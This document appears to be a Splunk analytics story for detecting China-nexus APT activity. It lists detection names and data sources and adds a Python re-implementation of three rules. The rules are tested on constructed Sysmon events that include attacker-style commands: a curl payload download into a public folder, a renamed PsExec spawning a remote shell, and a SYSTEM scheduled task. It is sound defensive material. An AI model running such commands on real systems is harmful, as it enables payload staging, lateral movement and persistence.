Analytics Story: Nexus APT Threat Activity

Description

Use these searches to detect and investigate unusual activity that may relate to China-nexus advanced persistent threat (APT) actors, who are known for stealthy, long-term access and strategic targeting of high-value sectors. Monitor for indicators such as spear-phishing, exploitation of unpatched or zero-day vulnerabilities in edge devices, and unauthorized lateral movement within the network. Investigate anomalous data exfiltration, unexpected encrypted or non-application-layer communications (for example large outbound ICMP payloads), and host behaviors that align with their known tactics, techniques, and procedures (TTPs). Combining threat intelligence with real-time monitoring helps identify and respond to this activity early, minimizing potential damage and data loss.

Why it matters

Chinese state-nexus threat actors are known to target the telecommunications and technology sectors in multiple countries, including the US, to maintain sustained access as well as conduct espionage. Compromised entities in either sector represent potential supply chain vectors of concern to Splunk, although telecommunications entities are a more pervasive and acute concern in this regard. These actors are also known to broadly target unpatched routers, switches and other edge devices across various sectors. Given these threats, Splunk Threat Intelligence (TI) undertook a detailed investigation into China-nexus tactics and techniques that could be used in attempts to compromise Splunk. This report is the result of that investigation, detailing noteworthy behaviors and tools employed by China-nexus targeted intrusion actors.

Detections

Name | Technique | Type
Any Powershell DownloadFile | PowerShell, Ingress Tool Transfer | TTP
Detect Renamed PSExec | Service Execution | Hunting
Detect Renamed WinRAR | Archive via Utility | Hunting
Executables Or Script Creation In Suspicious Path | Masquerading | Anomaly
Linux Auditd File Permission Modification Via Chmod | Linux and Mac File and Directory Permissions Modification | Anomaly
Linux Auditd Nopasswd Entry In Sudoers File | Sudo and Sudo Caching | Anomaly
Linux Auditd Possible Access To Credential Files | /etc/passwd and /etc/shadow | Anomaly
Linux Auditd Possible Access To Sudoers File | Sudo and Sudo Caching | Anomaly
Linux Auditd Preload Hijack Library Calls | Dynamic Linker Hijacking | TTP
Linux Common Process For Elevation Control | Setuid and Setgid | Hunting
Linux File Creation In Init Boot Directory | RC Scripts | Anomaly
Linux Iptables Firewall Modification | Disable or Modify System Firewall | Anomaly
Linux NOPASSWD Entry In Sudoers File | Sudo and Sudo Caching | Anomaly
Linux Possible Access To Credential Files | /etc/passwd and /etc/shadow | Anomaly
Linux Possible Access To Sudoers File | Sudo and Sudo Caching | Anomaly
Linux Preload Hijack Library Calls | Dynamic Linker Hijacking | TTP
Linux Sudoers Tmp File Creation | Sudo and Sudo Caching | Anomaly
Malicious PowerShell Process - Execution Policy Bypass | PowerShell | Anomaly
Non Chrome Process Accessing Chrome Default Dir | Credentials from Web Browsers | Anomaly
PowerShell 4104 Hunting | PowerShell | Hunting
Registry Keys Used For Persistence | Registry Run Keys / Startup Folder | TTP
Remote Process Instantiation via WMI | Windows Management Instrumentation | TTP
Scheduled Task Deleted Or Created via CMD | Scheduled Task | TTP
Suspicious Regsvr32 Register Suspicious Path | Regsvr32 | TTP
Suspicious Scheduled Task from Public Directory | Scheduled Task | Anomaly
Windows Access Token Manipulation SeDebugPrivilege | Create Process with Token | Anomaly
Windows Archive Collected Data via Rar | Archive via Utility | Anomaly
Windows Credentials from Password Stores Chrome LocalState Access | Query Registry | Anomaly
Windows Credentials from Password Stores Chrome Login Data Access | Query Registry | Anomaly
Windows Curl Download to Suspicious Path | Ingress Tool Transfer | TTP
Windows Replication Through Removable Media | Replication Through Removable Media | TTP
Windows Service Created with Suspicious Service Path | Service Execution | TTP
Windows Service Creation Using Registry Entry | Services Registry Permissions Weakness | Anomaly
Windows Unsigned DLL Side-Loading | DLL Side-Loading | Anomaly
Windows Unsigned DLL Side-Loading In Same Process Path | DLL Side-Loading | TTP
Windows Unsigned MS DLL Side-Loading | DLL Side-Loading, Boot or Logon Autostart Execution | Anomaly
WinEvent Scheduled Task Created to Spawn Shell | Scheduled Task | TTP
WinEvent Scheduled Task Created Within Public Path | Scheduled Task | TTP
Detect Large Outbound ICMP Packets | Non-Application Layer Protocol | TTP
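
The detections above are distributed as Splunk searches; to show what three of them look for at the field level, here is an added illustrative re-implementation in Python that runs over constructed Sysmon EventID 1 (process creation) records. It is not Splunk's SPL and is not code from this story. It covers Windows Curl Download to Suspicious Path, Detect Renamed PSExec and Suspicious Scheduled Task from Public Directory. Assumptions are labelled in the code: the list of user-writable "public" directories is an assumed approximation, and the renamed-PsExec rule relies on Sysmon's OriginalFileName, which comes from the binary's PE version resource (Sysinternals PsExec reports psexec.c there) and survives a rename on disk.

```python
"""Illustrative re-implementation of three listed detections over constructed
Sysmon EventID 1 records. Added example; not Splunk's own SPL."""
import re
from dataclasses import dataclass

# Assumed list of directories a non-admin user can write to. The "Public Path"
# and "Suspicious Path" detections key on locations like these.
PUBLIC_DIRS = (
    "\\users\\public\\",
    "\\programdata\\",
    "\\windows\\temp\\",
    "\\appdata\\local\\temp\\",
    "\\perflogs\\",
)


@dataclass
class ProcEvent:
    """Subset of Sysmon EventID 1 fields the three rules need."""
    image: str
    command_line: str
    original_file_name: str
    parent_image: str = ""


def in_public_dir(path: str) -> bool:
    p = path.strip('"').lower()
    return any(d in p for d in PUBLIC_DIRS)


def curl_output_path(cmdline: str):
    """Return the file curl is told to write via -o FILE / --output FILE, else None.
    Flags are matched case-sensitively so that -O (remote name) is not confused with -o."""
    m = re.search(r'(?:^|\s)(?:-o|--output)\s+("[^"]+"|\S+)', cmdline)
    return m.group(1).strip('"') if m else None


def rule_curl_download_to_suspicious_path(ev: ProcEvent) -> bool:
    if not ev.image.lower().endswith("\\curl.exe"):
        return False
    out = curl_output_path(ev.command_line)
    return out is not None and in_public_dir(out)


def rule_renamed_psexec(ev: ProcEvent) -> bool:
    # OriginalFileName is read from the PE version resource, so renaming the
    # file on disk does not change it (assumption: PsExec reports "psexec.c").
    if ev.original_file_name.lower() not in ("psexec.c", "psexec.exe", "psexec64.exe"):
        return False
    base = ev.image.lower().rsplit("\\", 1)[-1]
    return base not in ("psexec.exe", "psexec64.exe")


def rule_scheduled_task_from_public_dir(ev: ProcEvent) -> bool:
    if not ev.image.lower().endswith("\\schtasks.exe"):
        return False
    cl = ev.command_line
    if not re.search(r"/create\b", cl, re.I):
        return False
    m = re.search(r'/tr\s+("[^"]+"|\S+)', cl, re.I)  # task action (what gets run)
    return m is not None and in_public_dir(m.group(1))


RULES = {
    "Windows Curl Download to Suspicious Path": rule_curl_download_to_suspicious_path,
    "Detect Renamed PSExec": rule_renamed_psexec,
    "Suspicious Scheduled Task from Public Directory": rule_scheduled_task_from_public_dir,
}


def run_rules(events):
    """Return (rule name, Image) pairs for every event that fires a rule."""
    return [(name, ev.image) for ev in events for name, rule in RULES.items() if rule(ev)]


# Constructed sample events (not real telemetry); three should fire, three should not.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\curl.exe",
              r"curl.exe -s http://203.0.113.10/u.dat -o C:\Users\Public\Libraries\u.dat",
              "curl.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\curl.exe",
              r"curl.exe -s https://example.com/ -o C:\Users\alice\Downloads\page.html",
              "curl.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Users\Public\svc.exe",
              r"svc.exe \\10.0.0.5 -accepteula -s cmd.exe",
              "psexec.c", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Tools\PsExec.exe",
              r"PsExec.exe \\10.0.0.5 -accepteula cmd.exe",
              "psexec.c", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 15 /tn Updater /tr "C:\ProgramData\upd.exe" /ru SYSTEM',
              "schtasks.exe", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc daily /tn Backup /tr "C:\Program Files\Backup\bk.exe"',
              "schtasks.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, image in run_rules(SAMPLE_EVENTS):
        print(f"[{name}] {image}")
```

The second event of each pair is the benign twin that the rule must not fire on: curl writing into a user's own profile, the unrenamed PsExec binary, and a task whose action lives under Program Files. When tuning the real searches, expect the same shape of false-positive control: allow-listing by output path, by original file name, or by task action rather than by process name alone.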

Data Sources

Name | Platform | Sourcetype | Source
CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike
Linux Auditd Execve | Linux | linux:audit | /var/log/audit/audit.log
Linux Auditd Path | Linux | linux:audit | /var/log/audit/audit.log
Linux Auditd Proctitle | Linux | linux:audit | /var/log/audit/audit.log
Palo Alto Network Traffic | Network | pan:traffic | screenconnect_palo_traffic
Powershell Script Block Logging 4104 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational
Sysmon EventID 1 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 11 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 13 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon EventID 7 | Windows | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
Sysmon for Linux EventID 1 | Linux | sysmon:linux | Syslog:Linux-Sysmon/Operational
Sysmon for Linux EventID 11 | Linux | sysmon:linux | Syslog:Linux-Sysmon/Operational
Windows Event Log Security 4663 | Windows | xmlwineventlog | XmlWinEventLog:Security
Windows Event Log Security 4688 | Windows | xmlwineventlog | XmlWinEventLog:Security
Windows Event Log Security 4698 | Windows | xmlwineventlog | XmlWinEventLog:Security
Windows Event Log Security 4703 | Windows | xmlwineventlog | XmlWinEventLog:Security
Windows Event Log System 7045 | Windows | xmlwineventlog | XmlWinEventLog:System

Source: GitHub | Version: 1